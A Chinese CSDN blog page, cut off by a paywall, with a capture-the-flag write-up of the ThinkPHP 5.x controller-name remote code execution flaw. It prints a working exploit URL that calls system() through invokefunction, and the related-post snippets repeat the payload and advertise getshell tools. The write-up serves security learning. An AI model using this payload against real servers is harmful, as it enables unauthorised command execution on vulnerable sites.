攻防世界 ThinkPHP V5(漏洞解析及利用)

最新推荐文章于 2024-08-11 19:27:09 发布
最新推荐文章于 2024-08-11 19:27:09 发布
阅读量1.3w 收藏 30
点赞数 13
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45676913/article/details/105467321
版权
这篇博客介绍了ThinkPHP V5的一个严重远程代码执行漏洞,该漏洞源于框架对控制器名的不足检测,使得攻击者可以调用任意类方法。文章详细分析了漏洞原理,并展示了如何通过修改URL进行漏洞利用,包括执行系统命令寻找并读取flag文件。
摘要由CSDN通过智能技术生成
  • 这么出名的漏洞,从网上找poc直接打

攻防世界这道题,考察的是thinkphp V5的漏洞,接下来我详细介绍一下thinkphp V5这个漏洞。

ThinkPHP 5漏洞简介

ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。

漏洞分析

程序未对控制器进行过滤,导致攻击者可以用 \(斜杠)调用任意类方法。

漏洞利用

在这里插入图片描述
将url 改变为:

http://159.138.137.79:63571/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

其中:s[1][]=(Linux指令)

在这里插入图片描述接下来我们找flag文件。

http://159.138

最低0.47元/天 解锁文章
高木正雄
关注
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
ThinkPHP v5.x命令执行利用工具(可getshell)
攻防世界-Web题目1(ThinkPHP V5框架漏洞、php伪协议)
weixin_54055099的博客
07-18 606
ThinkPHP V5的框架漏洞、php伪协议
ThinkPHP5.0.15漏洞解析及SQL注入
最新发布
m0_70638961的博客
08-11 361
通过查看5.0.15和5.0.16版本的对比,可以看到16版本对在Builder.php里面对数据库的增减做了修正,所以可以15版本的漏洞就存在在这里。这里的代码用的拼接的方式,就可以尝试使用报错注入来实现。到了这里就发现,我们注入的三个值在这里派上了用场,val[1]就是注入的报错语句,这里走完,返回的就是报错注入语句+1,接下来我们继续走,一直走到这里。为了清楚代码是怎么走的,我们可以在insert()打一个断点,重新提交后就可以进入断点了,这里我们可以看到username有三个值。
ThinkPHP V5漏洞解析利用)及tornado知识点
qq_62046696的博客
10-03 3580
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
Think PHP 5 RCE漏洞复现及排查
dayouzi的博客
08-11 2446
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞
NSSCTF-Web题目7(ThinkPHP V5 框架漏洞)
weixin_54055099的博客
06-07 1282
NSSCTF部分题目
thinkPHP_V5漏洞
qq_53099802的博客
04-28 3785
php_rce攻防世界
Thinkphp框架漏洞--->5,2024年最新网络安全进阶
2401_83947105的博客
04-14 1280
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
攻防世界 ThinkPHP V5
weixin_57938502的博客
11-20 932
程序未对控制器进行过滤,导致攻击者可以用 \(斜杠)调用任意类方法。 将url 改变为: http://159.138.137.79:63571/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag* 查找flag s[1][]=(Linux指令) 复制路径然后查看文件内容 http://
thinkphp漏洞_【安全通告】ThinkPHP V5远程命令执行漏洞
weixin_39757169的博客
11-25 297
2019年1月11日,ThinkPHP团队发布了ThinkPHP V5版本更新,本次更新包含了一个可以导致远程代码执行的严重安全漏洞。无独有偶,该框架在2018年12月10日发布的安全更新中同样包含一个可以导致远程代码执行的严重漏洞ThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用...
thinkphp v5.1.0
11-27
thinkphp v5.1.0官方最新版是一款php语言的开发框架,新版本完善缓存驱动,改进数据库查询,为云平台提供新的支持,需要的用户赶快来下载吧。
thinkphp漏洞图形化综合利用工具
05-23
Thinkphp(GUI)漏洞综合利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的支持) JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 检测不...
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的PHP框架之一,因其强大的功能和易用性深受开发者喜爱。然而,任何软件系统都可能存在安全漏洞ThinkPHP也不例外。为了保障Web应用的安全,开发者和安全专家们...
ThinkPHP V5 漏洞利用
weixin_45694388的博客
10-14 2303
ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 漏洞分析 程序未对控制器进行过滤,导致攻击者可以用 \(斜杠)调用任意类方法。 漏洞利用 构造payload: ?s=/index/\think\app/invokefunction&funct
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8889
ThinkPHP5系列远程代码执行漏洞复现(详细)
ThinkPHP 系列漏洞
SHELLCODE_8BIT的博客
11-18 3812
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
vulhub中ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
yougexiaojiuguan的博客
03-06 1053
漏洞复现过程的记录
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
qq_67473072的博客
07-13 6242
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

高木正雄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值